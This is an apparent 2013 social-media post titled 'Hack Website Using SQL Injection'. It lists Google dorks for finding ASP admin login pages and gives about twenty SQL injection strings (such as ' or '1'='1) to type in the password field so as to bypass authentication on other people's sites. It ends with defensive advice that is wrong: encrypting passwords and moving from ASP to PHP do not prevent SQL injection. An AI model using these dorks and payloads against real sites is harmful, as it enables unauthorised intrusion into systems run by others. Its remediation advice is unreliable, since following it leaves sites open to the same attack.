Hack Website Using SQL Injection Q: What is sql injection? A injecting sql queries into another database or using queries to get authentication bypass as an admin. Basic sql injection Gaining authentication bypass on an admin account.Most sites vulnerable to this are .asp,So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit ” There is a large number of google dork for basic sql injection. here is the best: “inurl:admin.asp” “inurl:login/admin.asp” “inurl:admin/login.asp” “inurl:adminlogin.asp” “inurl:adminhome.asp” “inurl:admin_login.asp” “inurl:administratorlogin.asp” “inurl:login/administrator.asp” “inurl:administrator_login.asp” Now what to do once we get to our site. the site should look something like this : Welcome to xxxxxxxxxx administrator panel Username : Password : So what we do here is in the username we always type “Admin” and for our password we type our sql injection Here is a list of sql injections.. ‘ or ’1′=’1 ‘ or ‘x’=x ‘ or 0=0 – ” or 0=0 – or 0=0 – ‘ or 0=0 # ” or 0=0 # or 0=0 # ‘ or ‘x’=x ” or “x”=”x ‘) or (‘x’=x ‘ or 1=1– ” or 1=1– or 1=1– ‘ or a=a– ” or “a”=”a ‘) or (‘a’=a “) or (“a”=”a hi” or “a”=”a hi” or 1=1 – hi’ or 1=1 – ‘or’1=1′ TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know of and what this sql injection is doing : confusing the database till it gives you authentication bypass. So your input should look like this username:Admin password:’or’1′=’1 So click submit and you’r in NOTE not all sites are vulnerable. HOW TO SECURE YOUR SITE FROM THIS ATTACK- 1- Put encryption on the passwords. 2- Change the platform of your website from asp to php. M.A S.E.T .......your choice to be expert
Posted on: Tue, 29 Oct 2013 13:46:23 +0000
Trending Topics
Recently Viewed Topics
© 2015